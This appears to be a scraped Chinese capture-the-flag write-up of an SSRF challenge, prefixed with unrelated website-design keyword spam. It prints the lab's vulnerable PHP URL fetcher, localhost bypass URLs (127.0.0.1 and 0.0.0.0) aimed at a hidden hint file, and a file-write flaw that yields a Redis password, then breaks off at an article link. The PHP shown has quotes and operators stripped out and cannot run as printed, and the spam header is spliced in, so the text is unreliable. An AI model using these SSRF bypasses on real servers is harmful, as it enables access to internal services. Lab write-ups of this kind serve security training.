杭州企业网站设计,wordpress 七牛 水印,霍尔果斯网站建设,住房和城乡规划建设局官方网站进入靶场 又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码
?php
// 检查 URL 是否为内部 IP 地址
function check_inner_ip($url)
{// 使用正则表达式检查 URL 格式是否以 http、https、gopher 或 d…
进入靶场 又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码又是代码
?php
// 检查 URL 是否为内部 IP 地址
function check_inner_ip($url)
{// 使用正则表达式检查 URL 格式是否以 http、https、gopher 或 dict 开头$match_result preg_match(/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/,$url);// 如果 URL 格式不匹配终止程序并输出错误信息if (!$match_result){die(url fomat error);}try{// 解析 URL$url_parse parse_url($url);}catch(Exception $e){// 解析 URL 出错时终止程序并输出错误信息die(url fomat error);return false;}// 获取 URL 中的主机名$hostname $url_parse[host];// 将主机名解析为 IP 地址$ip gethostbyname($hostname);// 将 IP 地址转换为长整型$int_ip ip2long($ip);// 检查 IP 地址是否属于内部 IP 地址范围127.0.0.0/8、10.0.0.0/8、172.16.0.0/12、192.168.0.0/16return ip2long(127.0.0.0)24 $int_ip24 || ip2long(10.0.0.0)24 $int_ip24 || ip2long(172.16.0.0)20 $int_ip20 || ip2long(192.168.0.0)16 $int_ip16;
}// 安全请求 URL 的函数
function safe_request_url($url)
{// 检查 URL 是否为内部 IP 地址if (check_inner_ip($url)){// 如果是内部 IP 地址输出信息echo $url. is inner ip;}else{// 使用 cURL 初始化一个会话$ch curl_init();// 设置请求的 URLcurl_setopt($ch, CURLOPT_URL, $url);// 设置将响应保存到变量而不是直接输出curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);// 不包含响应头信息curl_setopt($ch, CURLOPT_HEADER, 0);// 执行 cURL 请求$output curl_exec($ch);// 获取请求的信息$result_info curl_getinfo($ch);// 如果存在重定向 URLif ($result_info[redirect_url]){// 递归调用 safe_request_url 处理重定向 URLsafe_request_url($result_info[redirect_url]);}// 关闭 cURL 会话curl_close($ch);// 输出请求结果var_dump($output);}
}// 检查是否存在 url 参数
if(isset($_GET[url])){$url $_GET[url];// 如果 url 参数不为空if(!empty($url)){// 调用 safe_request_url 函数处理 URLsafe_request_url($url);}
}
else{// 如果没有 url 参数显示当前文件的源代码并进行语法高亮highlight_file(__FILE__);
}
// 请在本地访问 hint.php
?
根据代码信息开始构造url
?urlhttp://127.0.0.1/hint.php ?urlhttp://0.0.0.0/hint.php ?php
// 检查 REMOTE_ADDR 是否为 127.0.0.1如果是则显示当前文件的源代码并进行语法高亮
if($_SERVER[REMOTE_ADDR]127.0.0.1){// 使用 highlight_file 函数将当前文件的源代码高亮显示highlight_file(__FILE__);
}// 检查是否通过 POST 方法提交了名为 file 的参数
if(isset($_POST[file])){// 使用 file_put_contents 函数将一段 PHP 代码写入到 $_POST[file] 指定的文件中// 写入的内容为?php echo redispass is root;exit(); 加上 $_POST[file] 的内容file_put_contents($_POST[file],?php echo redispass is root;exit();.$_POST[file]);
}
得到redis密码为root
可是redis是啥啊 https://www.freebuf.com/articles/web/293030.html
先看看上面这篇文章吧我要好好理解理解
